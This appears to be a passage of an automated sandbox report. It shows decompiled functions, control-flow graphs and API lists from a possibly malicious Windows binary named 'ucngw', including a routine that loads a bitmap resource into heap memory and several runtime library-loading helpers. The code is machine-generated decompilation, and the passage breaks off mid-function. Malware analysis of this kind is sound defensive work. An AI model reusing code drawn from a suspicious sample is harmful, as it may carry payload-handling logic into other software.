    0x00c61c25
    0x00c61c5c
    0x00c61c64
    0x00c61c27
    0x00c61c29
    0x00c61c31
    0x00000000
    0x00c61c33
    0x00c61c34
    0x00c61c3a
    0x00c61c3f
    0x00000000
    0x00c61c41
    0x00c61c49
    0x00c61c4d
    0x00000000
    0x00c61c65
    0x00c61c6b
    0x00c61c73
    0x00c61c81
    0x00c61c81
    0x00c61c4d
    0x00c61c3f
    0x00c61c31
    0x00c61c0c
    0x00c61c11
    0x00c61c11
    0x00c61c0a

    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 00C61C00
    • FindResourceW.KERNEL32(00000000,00000065,BMP), ref: 00C61C1B
    • LoadResource.KERNEL32(00000000,00000000), ref: 00C61C29
    • LockResource.KERNEL32(00000000), ref: 00C61C34
    • SizeofResource.KERNEL32(00000000,00000000), ref: 00C61C43
      • Part of subcall function 00C619C0: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00C61C58), ref: 00C619D1
      • Part of subcall function 00C619C0: RtlAllocateHeap.NTDLL(00000000), ref: 00C619D8
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C5B9FF, Relevance: 9.2, APIs: 6, Instructions: 216

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 200 c5b9ff-c5ba18 201 c5ba2e-c5ba33 200->201 202 c5ba1a-c5ba2a call c5bfb6 200->202 203 c5ba35-c5ba3d 201->203 204 c5ba40-c5ba64 MultiByteToWideChar 201->204 202->201 212 c5ba2c 202->212 203->204 206 c5ba6a-c5ba76 204->206 207 c5bbf7-c5bc0a call c51252 204->207 209 c5ba78-c5ba89 206->209 210 c5baca 206->210 214 c5ba8b-c5ba9a call c5dd20 209->214 215 c5baa8-c5bab9 call c561ab 209->215 216 c5bacc-c5bace 210->216 212->201 220 c5bbec 214->220 227 c5baa0-c5baa6 214->227 215->220 228 c5babf 215->228 219 c5bad4-c5bae7 MultiByteToWideChar 216->219 216->220 219->220 221 c5baed-c5baff call c59349 219->221 223 c5bbee-c5bbf5 call c59ba7 220->223 229 c5bb04-c5bb08 221->229 223->207 231 c5bac5-c5bac8 227->231 228->231 229->220 232 c5bb0e-c5bb15 229->232 231->216 233 c5bb4f-c5bb5b 232->233 234 c5bb17-c5bb1c 232->234 236 c5bba7 233->236 237 c5bb5d-c5bb6e 233->237 234->223 235 c5bb22-c5bb24 234->235 235->220 239 c5bb2a-c5bb44 call c59349 235->239 238 c5bba9-c5bbab 236->238 240 c5bb70-c5bb7f call c5dd20 237->240 241 c5bb89-c5bb9a call c561ab 237->241 244 c5bbe5-c5bbeb call c59ba7 238->244 245 c5bbad-c5bbc6 call c59349 238->245 239->223 253 c5bb4a 239->253 240->244 255 c5bb81-c5bb87 240->255 241->244 252 c5bb9c 241->252 244->220 245->244 258 c5bbc8-c5bbcf 245->258 257 c5bba2-c5bba5 252->257 253->220 255->257 257->238 259 c5bbd1-c5bbd2 258->259 260 c5bc0b-c5bc11 258->260 261 c5bbd3-c5bbe3 WideCharToMultiByte 259->261 260->261 261->244 262 c5bc13-c5bc1a call c59ba7 261->262 262->223
    C-Code - Quality: 69%
    			E00C5B9FF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				void* _t80;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				void* _t99;
				short* _t101;
				int _t103;
				void* _t104;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xc6a004; // 0x26d30358
				_v8 = _t49 ^ _t106;
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E00C5BFB6(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t99);
					_pop(_t104);
					_pop(_t80);
					return E00C51252(_t80, _v8 ^ _t106, _t99, _t104);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00C59BA7(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00C59349(_t81, _t85, _v12, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00C59BA7(_t101);
									goto L36;
								}
								_t62 = E00C59349(_t81, _t87, _t101, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00C59BA7(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00C561AB(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00C5DD20();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00C59349(_t81, 0, _t100, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00C561AB(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00C5DD20();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}
































    0x00c5ba04
    0x00c5ba05
    0x00c5ba06
    0x00c5ba0d
    0x00c5ba12
    0x00c5ba18
    0x00c5ba1e
    0x00c5ba24
    0x00c5ba27
    0x00c5ba27
    0x00c5ba2a
    0x00c5ba2c
    0x00c5ba2c
    0x00c5ba2a
    0x00c5ba2e
    0x00c5ba33
    0x00c5ba3a
    0x00c5ba3d
    0x00c5ba3d
    0x00c5ba59
    0x00c5ba5f
    0x00c5ba64
    0x00c5bbf7
    0x00c5bbfa
    0x00c5bbfb
    0x00c5bbfc
    0x00c5bc0a
    0x00c5ba6a
    0x00c5ba6a
    0x00c5ba6d
    0x00c5ba72
    0x00c5ba76
    0x00c5baca
    0x00c5baca
    0x00c5bacc
    0x00c5bace
    0x00c5bbec
    0x00c5bbec
    0x00c5bbee
    0x00c5bbef
    0x00000000
    0x00c5bbf5
    0x00c5badf
    0x00c5bae5
    0x00c5bae7
    0x00000000
    0x00000000
    0x00c5baed
    0x00c5baff
    0x00c5bb04
    0x00c5bb08
    0x00000000
    0x00000000
    0x00c5bb15
    0x00c5bb4f
    0x00c5bb52
    0x00c5bb55
    0x00c5bb57
    0x00c5bb59
    0x00c5bb5b
    0x00c5bba7
    0x00c5bba7
    0x00c5bba9
    0x00c5bba9
    0x00c5bbab
    0x00c5bbe5
    0x00c5bbe6
    0x00000000
    0x00c5bbeb
    0x00c5bbbf
    0x00c5bbc4
    0x00c5bbc6
    0x00000000
    0x00000000
    0x00c5bbca
    0x00c5bbcb
    0x00c5bbcc
    0x00c5bbcf
    0x00c5bc0b
    0x00c5bc0e
    0x00c5bbd1
    0x00c5bbd1
    0x00c5bbd2
    0x00c5bbd2
    0x00c5bbdf
    0x00c5bbe1
    0x00c5bbe3
    0x00c5bc14
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00c5bbe3
    0x00c5bb5d
    0x00c5bb60
    0x00c5bb62
    0x00c5bb64
    0x00c5bb66
    0x00c5bb69
    0x00c5bb6e
    0x00c5bb89
    0x00c5bb8b
    0x00c5bb95
    0x00c5bb97
    0x00c5bb98
    0x00c5bb9a
    0x00000000
    0x00000000
    0x00c5bb9c
    0x00c5bba2
    0x00c5bba2
    0x00000000
    0x00c5bba2
    0x00c5bb70
    0x00c5bb72
    0x00c5bb76
    0x00c5bb7b
    0x00c5bb7d
    0x00c5bb7f
    0x00000000
    0x00000000
    0x00c5bb81
    0x00000000
    0x00c5bb81
    0x00c5bb17
    0x00c5bb1c
    0x00000000
    0x00000000
    0x00c5bb22
    0x00c5bb24
    0x00000000
    0x00000000
    0x00c5bb3b
    0x00c5bb40
    0x00c5bb44
    0x00000000
    0x00000000
    0x00000000
    0x00c5bb4a
    0x00c5ba7d
    0x00c5ba7f
    0x00c5ba81
    0x00c5ba89
    0x00c5baa8
    0x00c5baaa
    0x00c5bab4
    0x00c5bab6
    0x00c5bab7
    0x00c5bab9
    0x00000000
    0x00000000
    0x00c5babf
    0x00c5bac5
    0x00c5bac5
    0x00000000
    0x00c5bac5
    0x00c5ba8d
    0x00c5ba91
    0x00c5ba96
    0x00c5ba9a
    0x00000000
    0x00000000
    0x00c5baa0
    0x00000000
    0x00c5baa0

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00C5BC50,?,?,00000000), ref: 00C5BA59
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00C5BC50,?,?,00000000,?,?,?), ref: 00C5BADF
      • Part of subcall function 00C59349: LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00C593BA
      • Part of subcall function 00C561AB: RtlAllocateHeap.NTDLL(00000000,00C51FCA,?,?,00C534C0,?,?,1FFFFFFF,?,?,00C51EFE,00C51FCA,?,?,?,?), ref: 00C561DD
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C5BBD9
    • __freea.LIBCMT ref: 00C5BBE6
    • __freea.LIBCMT ref: 00C5BBEF
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    • __freea.LIBCMT ref: 00C5BC14
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C53F46, Relevance: 6.1, APIs: 4, Instructions: 54library

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 265 c53f46-c53f61 266 c53f6e-c53f88 LoadLibraryExW 265->266 267 c53f63-c53f6c 265->267 269 c53fb1-c53fb7 266->269 270 c53f8a-c53f93 GetLastError 266->270 268 c53fc3-c53fc6 267->268 273 c53fc0 269->273 274 c53fb9-c53fba FreeLibrary 269->274 271 c53f95-c53fa0 LoadLibraryExW 270->271 272 c53fa2 270->272 275 c53fa4-c53fa6 271->275 272->275 276 c53fc2 273->276 274->273 275->269 277 c53fa8-c53faf 275->277 276->268 277->276
    C-Code - Quality: 65%
    			E00C53F46(signed int _a4) {
				void* _t10;
				void* _t13;
				signed int _t15;
				signed int _t21;
				WCHAR* _t22;
				signed int* _t25;
				void* _t27;

				_t21 = _a4;
				_t25 = 0xc6ad54 + _t21 * 4;
				asm("lock cmpxchg [edi], ecx");
				if(0 == 0) {
					_t22 =  *(0xc63264 + _t21 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				asm("sbb eax, eax");
				return  ~0x00000001 & 0;
			}










    0x00c53f4a
    0x00c53f52
    0x00c53f59
    0x00c53f61
    0x00c53f6e
    0x00c53f7e
    0x00c53f84
    0x00c53f88
    0x00c53fb1
    0x00c53fb3
    0x00c53fb7
    0x00c53fba
    0x00c53fba
    0x00c53fc0
    0x00c53fc2
    0x00000000
    0x00c53fc2
    0x00c53f8a
    0x00c53f93
    0x00c53fa2
    0x00c53f95
    0x00c53f98
    0x00c53f9e
    0x00c53f9e
    0x00c53fa6
    0x00000000
    0x00c53fa8
    0x00c53fab
    0x00c53fad
    0x00000000
    0x00c53fad
    0x00c53fa6
    0x00c53f68
    0x00000000

    APIs
    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00C6AD38,?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx), ref: 00C53F7E
    • GetLastError.KERNEL32(?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx,00000000,?,00C53E34), ref: 00C53F8A
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx), ref: 00C53F98
    • FreeLibrary.KERNEL32(00000000,?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx,00000000), ref: 00C53FBA
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 1000238B, Relevance: 6.1, APIs: 4, Instructions: 54library

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 278 1000238b-100023a6 279 100023a8-100023b1 278->279 280 100023b3-100023cd LoadLibraryExW 278->280 283 10002408-1000240b 279->283 281 100023cf-100023d8 GetLastError 280->281 282 100023f6-100023fc 280->282 284 100023da-100023e5 LoadLibraryExW 281->284 285 100023e7 281->285 286 100023fe-100023ff FreeLibrary 282->286 287 10002405 282->287 288 100023e9-100023eb 284->288 285->288 286->287 289 10002407 287->289 288->282 290 100023ed-100023f4 288->290 289->283 290->289
    C-Code - Quality: 65%
    			E1000238B(signed int _a4) {
				void* _t10;
				void* _t13;
				signed int _t15;
				signed int _t21;
				WCHAR* _t22;
				signed int* _t25;
				void* _t27;

				_t21 = _a4;
				_t25 = 0x1001ebc0 + _t21 * 4;
				asm("lock cmpxchg [edi], ecx");
				if(0 == 0) {
					_t22 =  *(0x1001518c + _t21 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				asm("sbb eax, eax");
				return  ~0x00000001 & 0;
			}










    0x1000238f
    0x10002397
    0x1000239e
    0x100023a6
    0x100023b3
    0x100023c3
    0x100023c9
    0x100023cd
    0x100023f6
    0x100023f8
    0x100023fc
    0x100023ff
    0x100023ff
    0x10002405
    0x10002407
    0x00000000
    0x10002407
    0x100023cf
    0x100023d8
    0x100023e7
    0x100023da
    0x100023dd
    0x100023e3
    0x100023e3
    0x100023eb
    0x00000000
    0x100023ed
    0x100023f0
    0x100023f2
    0x00000000
    0x100023f2
    0x100023eb
    0x100023ad
    0x00000000

    APIs
    • LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,00000001,?,?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree), ref: 100023C3
    • GetLastError.KERNEL32(?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree,10015250,FlsFree,00000000,?,10002275,00000005), ref: 100023CF
    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree,10015250,FlsFree,00000000), ref: 100023DD
    • FreeLibrary.KERNEL32(00000000,?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree,10015250,FlsFree,00000000,?,10002275), ref: 100023FF
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C59111, Relevance: 6.1, APIs: 4, Instructions: 52library

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 291 c59111-c59125 292 c59132-c5914d LoadLibraryExW 291->292 293 c59127-c59130 291->293 295 c5914f-c59158 GetLastError 292->295 296 c59176-c5917c 292->296 294 c59189-c5918b 293->294 299 c5915a-c59165 LoadLibraryExW 295->299 300 c59167 295->300 297 c5917e-c5917f FreeLibrary 296->297 298 c59185 296->298 297->298 301 c59187-c59188 298->301 302 c59169-c5916b 299->302 300->302 301->294 302->296 303 c5916d-c59174 302->303 303->301
    C-Code - Quality: 95%
    			E00C59111(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xc6b3b8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xc64298 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x26d30359
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}











    0x00c59116
    0x00c5911a
    0x00c59121
    0x00c59125
    0x00c59133
    0x00c59143
    0x00c59149
    0x00c5914d
    0x00c59176
    0x00c59178
    0x00c5917c
    0x00c5917f
    0x00c5917f
    0x00c59185
    0x00c59187
    0x00000000
    0x00c59188
    0x00c5914f
    0x00c59158
    0x00c59167
    0x00c5915a
    0x00c5915d
    0x00c59163
    0x00c59163
    0x00c5916b
    0x00000000
    0x00c5916d
    0x00c59170
    0x00c59172
    0x00000000
    0x00c59172
    0x00c5916b
    0x00c59127
    0x00c5912c
    0x00000000

    APIs
    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue), ref: 00C59143
    • GetLastError.KERNEL32(?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364,?,00C58072), ref: 00C5914F
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000), ref: 00C5915D
    • FreeLibrary.KERNEL32(00000000,?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364), ref: 00C5917F
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 10006962, Relevance: 6.1, APIs: 4, Instructions: 52library

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 304 10006962-10006976 305 10006978-10006981 304->305 306 10006983-1000699e LoadLibraryExW 304->306 309 100069da-100069dc 305->309 307 100069c7-100069cd 306->307 308 100069a0-100069a9 GetLastError 306->308 310 100069cf-100069d0 FreeLibrary 307->310 311 100069d6 307->311 312 100069b8 308->312 313 100069ab-100069b6 LoadLibraryExW 308->313 310->311 314 100069d8-100069d9 311->314 315 100069ba-100069bc 312->315 313->315 314->309 315->307 316 100069be-100069c5 315->316 316->314
    C-Code - Quality: 95%
    			E10006962(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x1001ed88 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x10016758 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x26c1db25
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}











    0x10006967
    0x1000696b
    0x10006972
    0x10006976
    0x10006984
    0x10006994
    0x1000699a
    0x1000699e
    0x100069c7
    0x100069c9
    0x100069cd
    0x100069d0
    0x100069d0
    0x100069d6
    0x100069d8
    0x00000000
    0x100069d9
    0x100069a0
    0x100069a9
    0x100069b8
    0x100069ab
    0x100069ae
    0x100069b4
    0x100069b4
    0x100069bc
    0x00000000
    0x100069be
    0x100069c1
    0x100069c3
    0x00000000
    0x100069c3
    0x100069bc
    0x10006978
    0x1000697d
    0x00000000

    APIs
    • LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,?,00000001,?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId), ref: 10006994
    • GetLastError.KERNEL32(?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000), ref: 100069A0
    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000), ref: 100069AE
    • FreeLibrary.KERNEL32(00000000,?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000), ref: 100069D0
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 10012FF0, Relevance: 5.1, APIs: 4, Instructions: 108

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 353 10012ff0-10013049 354 1001304f-1001305b 353->354 355 1001304b-1001304d 353->355 356 10013060-1001306b call 10011d50 354->356 355->356 358 10013070-10013078 356->358 359 10013176-1001317b 358->359 360 1001307e-10013097 LocalAlloc 358->360 360->359 361 1001309d-100130c0 call 10014010 360->361 364 100130c6-100130e5 361->364 365 1001316f-10013170 LocalFree 361->365 366 100130e7-1001310f LocalAlloc 364->366 367 1001313c-10013166 call 10011d50 364->367 365->359 366->367 369 10013111-10013139 call 10014010 366->369 367->365 372 10013168-10013169 LocalFree 367->372 369->367 372->365
    C-Code - Quality: 91%
    			E10012FF0(signed int* _a4, intOrPtr _a8) {
				short _v6;
				void* _v10;
				void* _v16;
				signed short _v20;
				intOrPtr _v24;
				void _v28;
				intOrPtr _v32;
				void* _v36;
				intOrPtr _v40;
				char _v44;
				signed int _t43;
				signed char _t45;
				void* _t46;
				void* _t48;
				void* _t56;
				signed short _t60;
				void* _t62;
				signed int _t65;
				signed int _t70;
				intOrPtr _t78;
				void* _t87;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t92;

				_t90 = (_t88 & 0xfffffff8) - 0x28;
				_t75 =  *0x1001f2b4 * 0x7c;
				_t85 = _a8;
				asm("xorps xmm0, xmm0");
				_t82 = _a4;
				_v28 = 0;
				_v10 = 0;
				_v6 = 0;
				_t65 =  *_a4;
				_v36 = 0;
				asm("movups [esp+0x1a], xmm0");
				_v32 = 0x1001f2d0;
				_v44 =  *((intOrPtr*)(_a8 +  *((intOrPtr*)(0x1001a95c +  *0x1001f2b4 * 0x7c))));
				_v40 =  *_t65;
				_t43 =  *(_t65 + 0xc);
				if(_t43 >= 0x2800) {
					asm("sbb eax, eax");
					_t45 = (_t43 & 0x000f0000) + 0x10000;
				} else {
					_t45 = 0;
				}
				_t46 = E10011D50( *((intOrPtr*)(_t75 + 0x1001a94c)) + _t85, _t82, _t45); // executed
				_t91 = _t90 + 4;
				if(_v44 == 0) {
					L12:
					return _t46;
				} else {
					_t15 = 0x1001a9c0 +  *0x1001f2b4 * 0x7c; // 0x20
					_t46 = LocalAlloc(0x40,  *_t15);
					_t87 = _t46;
					if(_t87 == 0) {
						goto L12;
					}
					_v36 = _t87;
					_t48 = E10014010( &_v36,  &_v44,  *(0x1001a9c0 +  *0x1001f2b4 * 0x7c));
					_t92 = _t91 + 4;
					if(_t48 == 0) {
						L11:
						_t46 = LocalFree(_t87);
						goto L12;
					}
					_t70 =  *0x1001f2b4 * 0x7c;
					_v28 =  *_t87;
					_v24 =  *((intOrPtr*)(_t87 + 4));
					_t78 =  *((intOrPtr*)(_t87 +  *((intOrPtr*)(_t70 + 0x1001a9b8))));
					if(_t78 != 0) {
